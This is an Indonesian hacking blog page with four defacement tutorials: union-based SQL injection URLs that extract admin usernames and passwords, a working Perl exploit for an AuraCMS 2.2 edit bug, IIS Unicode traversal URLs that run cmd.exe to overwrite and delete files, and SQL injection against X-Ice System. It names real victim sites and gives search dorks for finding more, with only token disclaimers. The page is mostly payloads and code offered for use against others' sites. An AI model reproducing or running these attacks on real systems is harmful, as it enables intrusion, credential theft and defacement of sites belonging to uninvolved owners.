Senin, 29 Maret 2010

Sql Injection

hacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.

apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke 'query'
dengan cara manipulasi data input ke applikasi tsb.

ini salah satu cara melakukan tekhnik SQL injection, cara ini saya kutip dari http://jasakom.com oleh seorang penulis sebut saja cruz3N

oke, mari kita simak bersama-sama.

1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah http://www.target.com/berita.php?id=100

2. Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.

Contoh :
http://www.target.com/berita.php?id=100'

atau

http://www.target.com/berita.php?id=-100

4. Maka akan muncul pesan error...
"You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near '''
at line 1" Dan masih banyak lagi macamnya.

5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya...
Disini kita akan menggunakan perintah order by

Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*

Hohoho...apalagi itu "/*" ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake "--". Terserah aja...

Kalo "+" sebagai penghubung perintah...

6. Nah sampe sini langsung dah nyobain satu2...

http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)

Sampai muncul error...
Misalkan errornya disini...

http://www.target.com/berita.php?id=100+order+by+10/*

Berarti yang kita ambil adalah "9"
http://www.target.com/berita.php?id=100+order+by+9/*

7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION

Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*

Trus perhatikan angka berapa yang keluar (Kayak togel aja... ;p)

8. Misalnya angka hoki yang keluar adalah "3" maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah "version()" atau "@@version"

http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*

Atau

http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*

9. Nah kalo versinya 5 langsung aja pake perintah "information_schema" untuk melihat tabel dan kolom yang ada pada database...

Contoh :

http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*

Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya...Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain...ya maklum lah baru belajar...Hehehe...

Misalnya yang lo liat adalah table "admin"

Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata "table"-nya...

Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*

Misalnya kolom yang keluar adalah "password" dan "username"
Langsung aja kita liat isinya...

Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*

dan

http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*

Bisa diliat dah username ama passwordnya...Tinggal login...terus...Terserah Anda...
---------------------------------------------------

oke selamat mencoba.
terpenting jangan dilakukan di web teman anda ataupun di website Lokal.
Diposting oleh di Tidak ada komentar:

Deface Auracms 2.2

AuraCMS 2.2, 2.2.1, 2.2.2 Remote Exploit, Arbitrary Edit
=======================================================



Tulisan ini berisi tutorial bagaimana sebuah site yang berbasis AuraCMS 2.2 bisa kita exploit. Penyerangan yang dilakukan hanyalah sekedar mengubah isi tulisan dari suatu situs.

Bug ini terdapat pada file pages_data.php yang berlokasi di js/pages/pages_data.php. Bug ini ditemukan oleh k1tk4t, lihat keterangan lebih lengkapnya di :
  • http://Milw0rm.com/exploits/6033


    • -----

    Kita akan mencari situs target dengan Google. Dorknya : powered by AuraCMS 2.2

    Kita coba di salah satu situsnya...

    Untuk melihat apakah ada bug di pages_data.php-nya kita akan coba untuk mengakses berkas tersebut...

    Jika terdapat pesan error kurang lebih seperti ini :

    You Must Login First If Not Yet Have Account Please Register


    maka artinya pages_data.php-nya sudah dipatch sehingga kita tidak bisa mengakses sembarangan..

    Kita coba situs lain

    Kita coba di
  • http://harimansite.com/
    • yang memakai AuraCMS 2.2.2

    Cek pages_data.php-nya.

    Ternyata bisa kita akses... xixixixi....

    terlihat beberapa ID dari tulisan yang ada di situs ini. Di situs ini, tulisan dengan id nomor 1 adalah tulisan pembuka yang ada di halaman depan situs...

    Kita akan mencoba untuk mengubah tulisan tersebut

    Siapkan script Perl-nya. Kalian bisa menggunakan script perl di bawah :
    ============================================================
    use LWP::UserAgent;
    use HTTP::Cookies;
    use Getopt::Long;

    my $isijudul = "ISI JUDUL";
    my $isikonten = "Isi Konten";
    my $ambilkue = "http://situstarget.com/index.php";
    my $kue = HTTP::Cookies->new();
    my $hasil = "";
    my $browser = LWP::UserAgent->new;

    $arbitrary = "http://situstarget.com/js/pages/pages_data.php?action=edit_saved&id=";

    $hasil = $browser->get($arbitrary);

    $hasil = $browser->get($ambilkue);
    $kue->extract_cookies($hasil);
    $browser->cookie_jar($kue);

    $arbitrary .= "1";
    $hasil = $browser->post($arbitrary,["judul"=>$isijudul,"konten"=>$isikonten],);
    $konten = $hasil->content;
    print $konten ;
    =============================================================


    Ubah variabel isijudul dan isikonten dengan tulisan yang kalian inginkan.

    Ganti situstarget.com dengan situs yang akan kalian serang. Disini saya akan menggantinya dengan
    http://harimansite.com/

    Karena ID tulisan yang akan kita ubah adalah nomor 1 maka biarkan saja angka di kode sebelah kanan ini...

    Save dengan nama exploit.pl di direktori yang sama di interpreter Perl.
    Secara default, interpreter Perl terletak di C:\Perl\Bin.

    Nah, jalankan command prompt. Bagi yang make Vista, jalankan dengan opsi Run as Administrator.

    Masuk ke direktori interpreter Perl.

    Jalankan exploit.pl dengan perintah : perl exploit.pl

    Kita kan cuma ngubah tulisan... jadi gak repotin Admin... Adminnya tinggal nulis lagi kok... :D

    Sekarang, mari refresh situsnya...

    BINGO... berubah tulisannya...

    xixixi....

    ------
    Thx for watching
    END
    Diposting oleh di Tidak ada komentar:

    Deface Sederhana

    Langkah 1 : Mencari target

    Mencari target dapat dilakukan dengan berbagai cara hal ini tergantung kreativitas dan sarana yang dimiliki, dalam hal ini bisa berbentuk script IRC, scanner. Sebagai dasar mengetahui OS yang digunakan server suatu site dapat diketahui dengan mencarinya pada situs http://www.netcraft.com/

    Langkah 2 : Unicode

    Setelah target didapat maka digunakan Unicode. Unicode itu sendiri penulis juga tidak terlalu mengetahui secara mendetail, tapi pada dasarnya Unicode menggunakan bahasa ASCII. Server yang menggunakan OS NT dengan IIS sendiri mempunyai bug yang bisa ditembus dengan Unicode dalam hal ini bila server itu belum dipatch. Unicode yang berhasil ditemukan untuk memasuki server NT sudah banyak. Dan yang bisa dicoba sebagai berikut:

    http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
    http://target/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
    http://target/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
    http://target/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
    http://target/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

    Bila Unicode tersebut berhasil maka akan dapat dilihat tampilan seperti berikut:

    Directory of c:\
    06/03/01 09:59a (DIR) InetPub
    08/08/01 06:14p (DIR) WINNT

    Langkah 3 :Mencari halaman depan

    Saat membuka situs tersebut pada browser, kita pasti akan melihat tampilan muka dari site tersebut, perlu diperhatikan adalah file tampilan muka tersebut apa? biasanya antara lain: index.htm, index.html, default.htm, default.html. Kemudian dengan mengunakan Unicode tersebut kita mencari file tersebut letaknya dimana, biasanya di C:\inetpub\wwwroot (hal ini belum tentu). untuk mencari file tersebut dapat digunakan perintah:

    /c+dir/s+c:\index.htm

    Hal ini berarti perintah mencari file index.htm di dalam drive C
    Untuk melihat apakah file index.htm tersebut adalah yang digunakan pada halaman depan, dipergunakan perintah :

    /c+type+c:\direktory dan nama file, contoh : /c+type+c:\inetpub\wwwroot\index.htm

    Setelah anda menemukan file index.htm tersebut, maka sebaiknya anda copy dulu, hal ini agar tindakan Deface kita tidak terlalu merugikan Administrator dari server situs tersebut. Sehingga nantinya Admin tersebut mempunyai backup dari file index.
    perintah copy itu sendiri adalah:

    /c+copy+c:\

    contoh untuk pencopyan adalah:

    /c+copy+c:\inetpub\wwwroot\index.htm backupindex.htm

    untuk mempermudah pekerjaan dapat dilakukan pencopyan file cmd.exe yg berada di direktory c:/winnt/system32 dengan menggunakan nama anda, seperti :

    /c+copy+c:\winnt\system32\cmd.exe+c:\deface.exe

    hal ini berarti anda mencopy file cmd.exe ke dir c dgn nama deface.exe, sehingga untuk perintah2 selanjutnya tidak memerlukan /winnt/system32/cmd.exe?/ tapi cukup /deface.exe?/


    Langkah 4 : Meng-Copy file index.htm

    echo dalam dos berarti anda membuat file maka bila file index.htm yg asli anda echo berarti anda timpa dengan file index anda. Untuk perintahnya adalah:

    /deface.exe?/c+echo+"deface+was+here"+>+c:\inetpub\wwwroot\index.htm

    sehingga tampilan site depan telah terganti dengan tulisan
    deface was here

    Catatan:
    Hal ini berlaku bila file index.htm tersebut dapat diecho, karena sebagian server membatasi direktory root dengan atribut read only, sehingga perintah echo index.htm akan menghasilkan :
    Access Denied
    Untuk membuat deface anda menjadi lebih bagus, dapat digunakan bahasa HTML dan ASCII
    perintah-perintah lain :

    membuat direktory = /c+mkdir+c:\
    merubah nama file = /c+ren+c:\file
    menghapus file = /c+del+c:\file
    menghapus file Read-Only = /c+del+/R+c:\file

    Ini hanyalah bahan pelajaran...
    Apapun yang terjadi bukan tanggung jawab saya.
    Diposting oleh di Tidak ada komentar:

    SQL Injection for X-Ice system

    [URL="http://fasha.kokarga.com/2009/03/deface-web-menggunakan-sql-injection-pada-x-ice-system-v-1/"]Deface web menggunakan SQL Injection pada X-Ice System V-1


    Cara mendeface website yang memiliki bug SQL Injection.
    Bug di X-Ice system ditemukan oleh Cyberghost beberapa hari yang lalu, tapi sampai saat ini masih banyak vulnerability dari situs-situs yang masih bisa dideface

    Untuk mencari targetnya, silahkan menggunakan keyword inurl:/devami.asp?id= geri

    Korban yang saya dapatkan adalah :

    http://www.sinopagsl.k12.tr/devami.asp?id=22

    Untuk membuktikan websitenya vuln atau tidak anda bisa menghapus angka 22-nya.
    Yang anda dapatkan adalah kurang lebih error yang seperti ini

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'id='.
    /devami.asp, line 8

    Setelah ini kita akan.mencari username nya dengan mengganti angka 22 dengan

    -22+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

    kurang lebih alamat di browser seperti ini :
    http://www.sinopagsl.k12.tr/devami.asp?id=-22+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

    sekarang kita dapatkan usernamenya adalah ..........

    selanjutnya mencari password dengan cara mengganti angka 22 dengan

    -1+union+select+0,sifre,2,3,4,5,6,7+from+admin
    kurang lebih alamat di browser seperti ini :
    http://www.sinopagsl.k12.tr/devami.asp?id=-22+union+select+0,sifre,2,3,4,5,6,7+from+admin

    passwordnya adalah ......

    Sekarang login sebagai admin

    terserah anda mau di apakan web tersebut
    Diposting oleh di Tidak ada komentar:
    Langganan: Postingan (Atom)